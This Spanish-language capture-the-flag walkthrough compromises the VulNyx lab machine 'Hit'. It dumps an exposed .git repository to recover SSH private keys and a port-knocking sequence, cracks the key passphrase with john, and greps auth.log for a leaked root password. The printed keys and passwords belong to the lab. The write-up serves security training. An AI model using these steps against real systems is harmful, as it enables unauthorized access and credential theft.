VulNyx - Hit
Information
Hit es una máquina virtual vulnerable Linux de dificultad fácil de la plataforma VulNyx, fue creada por el usuario d4t4s3c y funciona correctamente en los hipervisores VirtualBox y VMware.
Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.53
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-27 12:30 CEST
Nmap scan report for 192.168.1.53
Host is up (0.000099s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
❯ nmap -sVC -p80 192.168.1.53
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-27 12:31 CEST
Nmap scan report for 192.168.1.53
Host is up (0.00035s latency).
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.22.1
| http-git:
| 192.168.1.53:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: Commit #5
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.22.1
Shell (charlie)
80/TCP (HTTP)
Site
Directory Brute Force
En el script NSE http-git del nmap inicial y en el fuzzing se observa que existe un .git
| http-git:
| 192.168.1.53:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: Commit #5
❯ gobuster dir -w /opt/common.txt -u http://192.168.1.53/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.53/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.git (Status: 301) [Size: 169] [--> http://192.168.1.53/.git/]
/.git/index (Status: 200) [Size: 65]
/.git/config (Status: 200) [Size: 92]
/.git/logs/ (Status: 200) [Size: 374]
/.git/HEAD (Status: 200) [Size: 23]
/index.html (Status: 200) [Size: 186]
Progress: 4746 / 4747 (99.98%)
===============================================================
Finished
===============================================================
.git
Download
❯ git-dumper "http://192.168.1.53/.git" git 2>/dev/null
[-] Testing http://192.168.1.53/.git/HEAD [200]
[-] Testing http://192.168.1.53/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://192.168.1.53/.git/ [200]
[-] Fetching http://192.168.1.53/.gitignore [404]
[-] Fetching http://192.168.1.53/.git/branches/ [200]
[-] Fetching http://192.168.1.53/.git/description [200]
[-] Fetching http://192.168.1.53/.git/config [200]
[-] Fetching http://192.168.1.53/.git/info/ [200]
[-] Fetching http://192.168.1.53/.git/refs/ [200]
[-] Fetching http://192.168.1.53/.git/hooks/ [200]
[-] Fetching http://192.168.1.53/.git/logs/ [200]
[-] Fetching http://192.168.1.53/.git/objects/ [200]
[-] Fetching http://192.168.1.53/.git/HEAD [200]
[-] Fetching http://192.168.1.53/.git/COMMIT_EDITMSG [200]
[-] Fetching http://192.168.1.53/.git/index [200]
[-] Fetching http://192.168.1.53/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://192.168.1.53/.git/hooks/commit-msg.sample [200]
[-] Fetching http://192.168.1.53/.git/hooks/fsmonitor-watchman.sample [200]
[-] Fetching http://192.168.1.53/.git/hooks/post-update.sample [200]
[-] Fetching http://192.168.1.53/.git/hooks/pre-commit.sample [200]
[-] Fetching http://192.168.1.53/.git/hooks/pre-push.sample [200]
[-] Fetching http://192.168.1.53/.git/hooks/pre-merge-commit.sample [200]
[-] Fetching http://192.168.1.53/.git/hooks/pre-applypatch.sample [200]
[-] Fetching http://192.168.1.53/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://192.168.1.53/.git/hooks/pre-receive.sample [200]
[-] Fetching http://192.168.1.53/.git/logs/refs/ [200]
[-] Fetching http://192.168.1.53/.git/hooks/update.sample [200]
[-] Fetching http://192.168.1.53/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching http://192.168.1.53/.git/objects/30/ [200]
[-] Fetching http://192.168.1.53/.git/objects/2b/ [200]
[-] Fetching http://192.168.1.53/.git/hooks/push-to-checkout.sample [200]
[-] Fetching http://192.168.1.53/.git/objects/0c/ [200]
[-] Fetching http://192.168.1.53/.git/objects/4b/ [200]
[-] Fetching http://192.168.1.53/.git/objects/5c/ [200]
[-] Fetching http://192.168.1.53/.git/objects/7d/ [200]
[-] Fetching http://192.168.1.53/.git/objects/73/ [200]
[-] Fetching http://192.168.1.53/.git/objects/7c/ [200]
[-] Fetching http://192.168.1.53/.git/objects/info/ [200]
[-] Fetching http://192.168.1.53/.git/objects/a7/ [200]
[-] Fetching http://192.168.1.53/.git/objects/94/ [200]
[-] Fetching http://192.168.1.53/.git/logs/HEAD [200]
[-] Fetching http://192.168.1.53/.git/objects/9c/ [200]
[-] Fetching http://192.168.1.53/.git/objects/99/ [200]
[-] Fetching http://192.168.1.53/.git/refs/heads/ [200]
[-] Fetching http://192.168.1.53/.git/objects/pack/ [200]
[-] Fetching http://192.168.1.53/.git/logs/refs/heads/ [200]
[-] Fetching http://192.168.1.53/.git/objects/2b/5a7479c36d425981b95982c37b10a34ce11aca [200]
[-] Fetching http://192.168.1.53/.git/objects/4b/825dc642cb6eb9a060e54bf8d69288fbee4904 [200]
[-] Fetching http://192.168.1.53/.git/objects/a9/ [200]
[-] Fetching http://192.168.1.53/.git/objects/7d/19f826926c775d465df62b5f82f66ec9fb7fa1 [200]
[-] Fetching http://192.168.1.53/.git/objects/30/36160351b1d7eda360bdd3fb8e65d535ad6df1 [200]
[-] Fetching http://192.168.1.53/.git/objects/5c/e5fff468df4e331e05d1f665faffb29632ff42 [200]
[-] Fetching http://192.168.1.53/.git/info/exclude [200]
[-] Fetching http://192.168.1.53/.git/objects/a7/685af0a6c8f0ecae7cd44159f3a6ceab3625d7 [200]
[-] Fetching http://192.168.1.53/.git/objects/0c/f5be47bae50c4aac01531288e7f71ba4be167c [200]
[-] Fetching http://192.168.1.53/.git/objects/73/9ad589e33f1e90bd2f1929c82f1037dfc73b09 [200]
[-] Fetching http://192.168.1.53/.git/objects/a9/980936fd3d509433e9862e9021aa5fb13351ac [200]
[-] Fetching http://192.168.1.53/.git/objects/7c/3df59ddda406f09e4e4d36ddbd9d1daf67fda3 [200]
[-] Fetching http://192.168.1.53/.git/objects/7d/ff168ec5d2174eae9a7ff7f4d1d87080a6c726 [200]
[-] Fetching http://192.168.1.53/.git/refs/heads/master [200]
[-] Fetching http://192.168.1.53/.git/objects/9c/a5eedec55e3c900f8685460aa4ce605f3d8472 [200]
[-] Fetching http://192.168.1.53/.git/objects/99/dd10f9077a951497d8a76305a3c4e26adb31ff [200]
[-] Fetching http://192.168.1.53/.git/objects/a9/d7d7d4c39d4335d1529d5f78dd621695761b5a [200]
[-] Fetching http://192.168.1.53/.git/refs/tags/ [200]
[-] Fetching http://192.168.1.53/.git/logs/refs/heads/master [200]
[-] Fetching http://192.168.1.53/.git/objects/94/9429787b70fbcfc3816c0ba158ee2c83bb9f66 [200]
[-] Sanitizing .git/config
[-] Running git checkout .
Logs
Listo un total de 5 commits y enumero en ellos al usuario charlie
❯ cd git
❯ git log --all
commit 2b5a7479c36d425981b95982c37b10a34ce11aca (HEAD -> master)
Author: charlie <charlie@hit.nyx>
Date: Mon Feb 3 23:33:01 2025 +0100
Commit #5
commit 7dff168ec5d2174eae9a7ff7f4d1d87080a6c726
Author: charlie <charlie@hit.nyx>
Date: Mon Feb 3 23:32:38 2025 +0100
Commit #4
commit a9980936fd3d509433e9862e9021aa5fb13351ac
Author: charlie <charlie@hit.nyx>
Date: Mon Feb 3 23:31:33 2025 +0100
Commit #3
commit 0cf5be47bae50c4aac01531288e7f71ba4be167c
Author: charlie <charlie@hit.nyx>
Date: Mon Feb 3 23:30:12 2025 +0100
Commit #2
commit 9ca5eedec55e3c900f8685460aa4ce605f3d8472
Author: charlie <charlie@hit.nyx>
Date: Mon Feb 3 23:29:26 2025 +0100
Commit #1
En el commit llamado Commit #3 (a9980936fd3d509433e9862e9021aa5fb13351ac) existen diferencias
❯ git log -p 'a9980936fd3d509433e9862e9021aa5fb13351ac'
id_rsa
------BEGIN OPENSSH PRIVATE KEY-----
-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
-RcXCLT2EU2tO0AAAAJcm9vdEBrYWxpAQI=
------END OPENSSH PRIVATE KEY-----
-
+-----BEGIN RSA PRIVATE KEY-----
+Proc-Type: 4,ENCRYPTED
+DEK-Info: DES-EDE3-CBC,3E2B3558346EF63A
+6ba1VKUz/cNss0/xw7FkmsfiG15ExhqArUxI7WCfiFKNaeuSdUNETexm38BmeC/b
+kmKErTAVzIpCtzCxXYEO8wOOyJRJEZGHNqtoq6bgrxcZaJfzONc1EM6aEIfQS+Ks
+zloh5Ye8FygCkU2bCSYnaLwyHuGUcJ72Oa+8jYJtsvr1Gd+z0CWJapRodsYnlvep
+5EGx+jaYDkOG3VEtvjfPvA+pezHPifDsLr03JNuGb4awvpTGoRqXjXSYSfKOKimy
+Jpip4JVxit3T9aaOu1wF5UIExRtTG9lj38Mb1H2zXENcONIX5nAPoacvvZtCp9iz
+20qafBdLgnvZF0sy9GEvjouXPNeAk/c19qTvAu6lSsQq0NliIcozN8tLyvNHUjPv
+s/BptewE2NK0YvkNNCNhTilVMPaaojhf8zIVqNeH3L99GBUjigNdd2kqYzX4CjG/
+7W8WLhl8gPDeM7eI+Tc94dRRopDfQxMkl/ZhpecXTQQj8Ay8kdSJ+788geA2ySUe
+eeeBZ2XZk1X73yoqE1n7mQfvoJwtQWsCATQvMZrVlAJv5XYzIQrtKsGmfv18FehN
+TosfUBrvqprm2093NHqgKsgZy12reQt8ZnQiusWiY4ozOQxLJnn6SnE2pSkNhOTj
+3Zi8x1WCH6qSOKREBnOZjWZJm4J8UgfqU3CpXKLaYDwPSSVjdHHX2D8m0yypxZGb
+7yP27mDSEgm2NxKbbesfEehqA+U3HvJClq9dgXYK14Phj6DRO8xDLBsP3GdlzZSB
+g2gIObMasB7lJl1zpre0FgP/Ee98xYwFSvu6nuHvfaEC++XXjJBI9xnAe23Bmlam
+7MIuk2eD+3R39skT5Sh5B8O/N2geMXL2G08QOLw5Yr5zvi8nNw1CkCO9saRf5x0x
+cfQfTQjGzwC/V0JvNtCZg8FDUlXeqoAd/skbZAmLNiFaNwQ2irOQmZvdmH/Zp23X
+HDKecWcpLhaa9xbbua84QMoP2lDm4NFLbPPxkG35kCW0qKGymWmqlZhkDiVoBdUJ
+psubanx2bCiCDHSoPGJq/4WW9agBuHd9POP3f1OJtDsgesJrZTUewomSDv5Vc039
+1PZI8qYCJIgojtlB0A7HFf/fJGSUjm5OmomDLi18HnTg6SiiEnmKtBtI7RkVkGSc
+6l+8RgddRFRY7/SmLUqEtLcgjjqFqT1yeKZAFxpGVxJh3c9eY0KNDbbnksPxV6B/
+Ogop0/2UWyQSudzhuDmPuXTHA8ZCohhl3S1RKzp0vnvZGyd83wbk427YrImnUqBh
+jMvFoMe664v6NwCvGk0H4oT5pz8guPH7EhnNGAYHQ65JtiAmn60fqqjF11mPN2mG
+z08EKhIsUZcYzl6zXelvKtI8oCPay7DAVh2YUVTCuXO0+ulaCrbhC4imvFTZflqP
+V1DUAhrK0WhvT97rnh7yI3cAO24Kp3dI0on7wB7OxV0NhbzypT3V9IJmOBbgXWW9
+TCG+r1FGBHQ6ywjmAeIGF3iui1MnU/TRbY7Zs0sqMZ3iT2jF8qNmfl0YhRtgXM9+
+o82sn1CEU4rITslU3qUHA5/yiFVRPuL48mbjTNbkLvzFfMQ/3ePdhg==
+-----END RSA PRIVATE KEY-----
knockd.conf
[options]
- UseSyslog
+ LogFile = /var/log/knockd.log
[openSSH]
- sequence = 7000,8000,9000
- seq_timeout = 5
- command = /sbin/iptables -A INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
+ sequence = 65535,8888,54111
+ seq_timeout = 1
+ command = /usr/sbin/service ssh start
tcpflags = syn
-
-[closeSSH]
- sequence = 9000,8000,7000
- seq_timeout = 5
- command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
- tcpflags = syn
-
-[openHTTPS]
- sequence = 12345,54321,24680,13579
- seq_timeout = 5
- command = /usr/local/sbin/knock_add -i -c INPUT -p tcp -d 443 -f %IP%
- tcpflags = syn
-
-
Obtengo los archivos con los ultimos cambios de Commit #3 (a9980936fd3d509433e9862e9021aa5fb13351ac)
❯ git checkout 'a9980936fd3d509433e9862e9021aa5fb13351ac'
❯ ls -la
drwxr-xr-x root root 4.0 KB Sun Jul 27 16:56:15 2025 .
drwxrwxrwx root root 4.0 KB Sun Jul 27 16:56:05 2025 ..
drwxr-xr-x root root 4.0 KB Sun Jul 27 16:56:15 2025 .git
.rw-r--r-- root root 1.7 KB Sun Jul 27 16:56:15 2025 id_rsa
.rw-r--r-- root root 163 B Sun Jul 27 16:56:15 2025 knockd.conf
❯ cat *
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,3E2B3558346EF63A
6ba1VKUz/cNss0/xw7FkmsfiG15ExhqArUxI7WCfiFKNaeuSdUNETexm38BmeC/b
kmKErTAVzIpCtzCxXYEO8wOOyJRJEZGHNqtoq6bgrxcZaJfzONc1EM6aEIfQS+Ks
zloh5Ye8FygCkU2bCSYnaLwyHuGUcJ72Oa+8jYJtsvr1Gd+z0CWJapRodsYnlvep
5EGx+jaYDkOG3VEtvjfPvA+pezHPifDsLr03JNuGb4awvpTGoRqXjXSYSfKOKimy
Jpip4JVxit3T9aaOu1wF5UIExRtTG9lj38Mb1H2zXENcONIX5nAPoacvvZtCp9iz
20qafBdLgnvZF0sy9GEvjouXPNeAk/c19qTvAu6lSsQq0NliIcozN8tLyvNHUjPv
s/BptewE2NK0YvkNNCNhTilVMPaaojhf8zIVqNeH3L99GBUjigNdd2kqYzX4CjG/
7W8WLhl8gPDeM7eI+Tc94dRRopDfQxMkl/ZhpecXTQQj8Ay8kdSJ+788geA2ySUe
eeeBZ2XZk1X73yoqE1n7mQfvoJwtQWsCATQvMZrVlAJv5XYzIQrtKsGmfv18FehN
TosfUBrvqprm2093NHqgKsgZy12reQt8ZnQiusWiY4ozOQxLJnn6SnE2pSkNhOTj
3Zi8x1WCH6qSOKREBnOZjWZJm4J8UgfqU3CpXKLaYDwPSSVjdHHX2D8m0yypxZGb
7yP27mDSEgm2NxKbbesfEehqA+U3HvJClq9dgXYK14Phj6DRO8xDLBsP3GdlzZSB
g2gIObMasB7lJl1zpre0FgP/Ee98xYwFSvu6nuHvfaEC++XXjJBI9xnAe23Bmlam
7MIuk2eD+3R39skT5Sh5B8O/N2geMXL2G08QOLw5Yr5zvi8nNw1CkCO9saRf5x0x
cfQfTQjGzwC/V0JvNtCZg8FDUlXeqoAd/skbZAmLNiFaNwQ2irOQmZvdmH/Zp23X
HDKecWcpLhaa9xbbua84QMoP2lDm4NFLbPPxkG35kCW0qKGymWmqlZhkDiVoBdUJ
psubanx2bCiCDHSoPGJq/4WW9agBuHd9POP3f1OJtDsgesJrZTUewomSDv5Vc039
1PZI8qYCJIgojtlB0A7HFf/fJGSUjm5OmomDLi18HnTg6SiiEnmKtBtI7RkVkGSc
6l+8RgddRFRY7/SmLUqEtLcgjjqFqT1yeKZAFxpGVxJh3c9eY0KNDbbnksPxV6B/
Ogop0/2UWyQSudzhuDmPuXTHA8ZCohhl3S1RKzp0vnvZGyd83wbk427YrImnUqBh
jMvFoMe664v6NwCvGk0H4oT5pz8guPH7EhnNGAYHQ65JtiAmn60fqqjF11mPN2mG
z08EKhIsUZcYzl6zXelvKtI8oCPay7DAVh2YUVTCuXO0+ulaCrbhC4imvFTZflqP
V1DUAhrK0WhvT97rnh7yI3cAO24Kp3dI0on7wB7OxV0NhbzypT3V9IJmOBbgXWW9
TCG+r1FGBHQ6ywjmAeIGF3iui1MnU/TRbY7Zs0sqMZ3iT2jF8qNmfl0YhRtgXM9+
o82sn1CEU4rITslU3qUHA5/yiFVRPuL48mbjTNbkLvzFfMQ/3ePdhg==
-----END RSA PRIVATE KEY-----
[options]
LogFile = /var/log/knockd.log
[openSSH]
sequence = 65535,8888,54111
seq_timeout = 1
command = /usr/sbin/service ssh start
tcpflags = syn
Port Knocking
Golpeo con knock la secuencia de puertos obtenida en el archivo de configuración y consigo abrir el puerto SSH
❯ nmap -sS -p22 192.168.1.53 | grep 'PORT' -A 1
PORT STATE SERVICE
22/tcp closed ssh
❯ knock 192.168.1.53 65535:tcp 8888:tcp 54111:tcp
❯ nmap -sS -p22 192.168.1.53 | grep 'PORT' -A 1
PORT STATE SERVICE
22/tcp open ssh
22/TCP (SSH)
La clave privada (id_rsa) se encuentra protegida por un passphrase
❯ ssh -i id_rsa charlie@192.168.1.53
Enter passphrase for key 'id_rsa':
Cracking (id_rsa)
Con john consigo obtener el passphrase charlie1
❯ ssh2john id_rsa > hash
❯ john --wordlist=/opt/techyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
charlie1 (id_rsa)
Accedo al sistema como usuario charlie con la clave privada (id_rsa) obtenida
❯ ssh -i id_rsa charlie@192.168.1.53
Enter passphrase for key 'id_rsa':
charlie@hit:~$ id ; hostname
uid=1000(charlie) gid=1000(charlie) grupos=1000(charlie),4(adm)
hit
Privilege Escalation
Enumeration
Group
El usuario charlie forma parte del grupo adm
(Los usuarios del grupo
admdisponen de permisos para leer archivos de tipo log)
charlie@hit:~$ id
uid=1000(charlie) gid=1000(charlie) grupos=1000(charlie),4(adm)
charlie@hit:~$ groups
charlie adm
Abuse
Encuentro unas credenciales en el archivo log (auth.log ) de SSH
(En ocasiones existe el error de introducir el password en la campo de user, muy común también en formularios de sitios web)
charlie@hit:~$ cd /var/log
charlie@hit:/var/log$ grep --color -riE "user|pass" 2>/dev/null
auth.log:2025-02-03T09:50:49.051052+01:00 hit sshd[701]: Invalid user r00tP4zzw0rd from 192.168.1.10 port 45796
Me convierto en usuario root
charlie@hit:~$ su -
Contraseña:
root@hit:~# id ; hostname
uid=0(root) gid=0(root) grupos=0(root)
hit
Flags
Ya como usuario root puedo leer las flags user.txt y root.txt
root@hit:~# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
f4b9****************************
2174****************************
Hasta aquí la resolución de la máquina Hit.
Happy Hacking!